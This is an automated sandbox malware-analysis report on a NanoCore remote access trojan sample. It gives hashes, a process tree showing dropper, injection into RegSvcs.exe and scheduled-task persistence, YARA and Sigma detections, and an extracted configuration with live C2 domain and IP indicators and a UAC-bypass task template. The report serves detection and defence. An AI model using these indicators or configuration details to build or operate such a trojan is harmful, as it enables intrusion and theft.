Windows Analysis Report YdACOWCggQ.exe

Overview

General Information

Sample Name: YdACOWCggQ.exe
Analysis ID: 501907
MD5: b866823e1f8f4a52376bd108c457dd78
SHA1: fe99849ec27630463080445337798eeba8000a02
SHA256: ebe1bb18a77cf0b34d3ad06919a9adfff2aa69cfafa5b96b670534b890e3e2a8
Tags: exe, NanoCore, RAT

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Yara detected Nanocore RAT
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Drops PE files with a suspicious file extension
Writes to foreign memory regions
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to execute programs as a different user
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Process Tree

  • System is w10x64
  • YdACOWCggQ.exe (PID: 4896 cmdline: 'C:\Users\user\Desktop\YdACOWCggQ.exe' MD5: B866823E1F8F4A52376BD108C457DD78)
    • mmuiqlcvwo.pif (PID: 5828 cmdline: 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp MD5: 8E699954F6B5D64683412CC560938507)
      • RegSvcs.exe (PID: 6240 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
        • schtasks.exe (PID: 6272 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpB828.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RegSvcs.exe (PID: 6348 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 6364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "c213d282-998c-4a04-8f80-944681ca", "Group": "nano stub", "Domain1": "ezeani.duckdns.org", "Domain2": "194.5.98.48", "Port": 8338, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n 
 <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xf7ad:$x1: NanoCore.ClientPluginHost
  • 0xf7da:$x2: IClientNetworkHost
0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xf7ad:$x2: NanoCore.ClientPluginHost
  • 0x10888:$s4: PipeCreated
  • 0xf7c7:$s5: IClientLoggingHost
0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xf7e5:$x1: NanoCore.ClientPluginHost
  • 0xf822:$x2: IClientNetworkHost
  • 0x13355:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
        • 0x1018d:$x1: NanoCore.ClientPluginHost
        • 0x101ca:$x2: IClientNetworkHost
        • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
        • 0xff05:$x1: NanoCore Client.exe
        • 0x1018d:$x2: NanoCore.ClientPluginHost
        • 0x117c6:$s1: PluginCommand
        • 0x117ba:$s2: FileCommand
        • 0x1266b:$s3: PipeExists
        • 0x18422:$s4: PipeCreated
        • 0x101b7:$s5: IClientLoggingHost
      8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
      8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
        • 0xfef5:$a: NanoCore
        • 0xff05:$a: NanoCore
        • 0x10139:$a: NanoCore
        • 0x1014d:$a: NanoCore
        • 0x1018d:$a: NanoCore
        • 0xff54:$b: ClientPlugin
        • 0x10156:$b: ClientPlugin
        • 0x10196:$b: ClientPlugin
        • 0x1007b:$c: ProjectData
        • 0x10a82:$d: DESCrypto
        • 0x1844e:$e: KeepAlive
        • 0x1643c:$g: LogClientMessage
        • 0x12637:$i: get_Connected
        • 0x10db8:$j: #=q
        • 0x10de8:$j: #=q
        • 0x10e04:$j: #=q
        • 0x10e34:$j: #=q
        • 0x10e50:$j: #=q
        • 0x10e6c:$j: #=q
        • 0x10e9c:$j: #=q
        • 0x10eb8:$j: #=q
      14.2.RegSvcs.exe.6290000.8.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
        • 0xf7ad:$x1: NanoCore.ClientPluginHost
        • 0xf7da:$x2: IClientNetworkHost

        Sigma Overview

        AV Detection:

        Sigma detected: NanoCore
        Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 6240, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        E-Banking Fraud:

        Sigma detected: NanoCore
        Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 6240, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        System Summary:

        Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
        Source: Process started, Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard, Data: Command: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp, ParentImage: C:\Users\user\33920049\mmuiqlcvwo.pif, ParentProcessId: 5828, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, ProcessId: 6240
        Sigma detected: Possible Applocker Bypass
        Source: Process started, Author: juju4, Data: Command: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp, ParentImage: C:\Users\user\33920049\mmuiqlcvwo.pif, ParentProcessId: 5828, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, ProcessId: 6240

        Stealing of Sensitive Information:

        Sigma detected: NanoCore
        Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 6240, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Remote Access Functionality:

        Sigma detected: NanoCore
        Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 6240, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Jbx Signature Overview

        AV Detection:

        Yara detected Nanocore RAT
        Found malware configuration
        Source: 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp, Malware Configuration Extractor: NanoCore (same configuration as shown under Malware Configuration)
        Multi AV Scanner detection for submitted file
        Source: YdACOWCggQ.exe, Virustotal: Detection: 35%
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\33920049\mmuiqlcvwo.pif, Virustotal: Detection: 26%
        Source: C:\Users\user\33920049\mmuiqlcvwo.pif, ReversingLabs: Detection: 32%
        Source: 14.2.RegSvcs.exe.6290000.8.unpack, Avira: Label: TR/NanoCore.fadte
        Source: 14.2.RegSvcs.exe.1300000.1.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
        Source: YdACOWCggQ.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: YdACOWCggQ.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: YdACOWCggQ.exe
        Source: Binary string: \??\C:\Users\user~1\AppData\Local\Temp\RegSvcs.pdb.0 source: RegSvcs.exe, 0000000E.00000003.312234271.0000000001AF7000.00000004.00000001.sdmp
        Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000E.00000002.774203048.0000000000E82000.00000002.00020000.sdmp, RegSvcs.exe, 00000011.00000000.313037318.0000000000BE2000.00000002.00020000.sdmp, RegSvcs.exe.8.dr
        Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe.8.dr
        Source: Binary string: C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 0000000E.00000003.312234271.0000000001AF7000.00000004.00000001.sdmp

        Networking:

        Uses dynamic DNS services
        Source: unknown, DNS query: name: ezeani.duckdns.org
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractor, URLs: ezeani.duckdns.org
        Source: Malware configuration extractor, URLs: 194.5.98.48
        Source: Joe Sandbox View, ASN Name: DANILENKODE DANILENKODE
        Source: Joe Sandbox View, IP Address: 194.5.98.48 194.5.98.48
        Source: global traffic, TCP traffic: 192.168.2.7:49750 -> 194.5.98.48:8338
        Source: unknown, DNS traffic detected: queries for: ezeani.duckdns.org

        E-Banking Fraud:

        Yara detected Nanocore RAT

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 14.2.RegSvcs.exe.4830704.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 8.3.mmuiqlcvwo.pif.4363658.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.3.mmuiqlcvwo.pif.4363658.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.784402740.00000000060F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegSvcs.exe PID: 6240, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegSvcs.exe PID: 6240, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 8_2_00876219 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
        Source: mmuiqlcvwo.pif.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\YdACOWCggQ.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
        Source: C:\Users\user\Desktop\YdACOWCggQ.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
        Source: C:\Users\user\Desktop\YdACOWCggQ.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
        Source: C:\Users\user\Desktop\YdACOWCggQ.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
        Source: C:\Users\user\Desktop\YdACOWCggQ.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
        Source: C:\Users\user\Desktop\YdACOWCggQ.exe Section loaded: dxgidebug.dll
        Source: Joe Sandbox View Dropped File: C:\Users\user\33920049\mmuiqlcvwo.pif C9A2399CC1CE6F71DB9DA2F16E6C025BF6CB0F4345B427F21449CF927D627A40
        Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\RegSvcs.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
        Source: YdACOWCggQ.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: 8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.RegSvcs.exe.6290000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.RegSvcs.exe.6290000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.RegSvcs.exe.4834d2d.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.RegSvcs.exe.4834d2d.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.RegSvcs.exe.6290000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.RegSvcs.exe.6290000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.43c9268.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.3.mmuiqlcvwo.pif.43c9268.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.43c9268.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.RegSvcs.exe.6294629.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.RegSvcs.exe.6294629.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
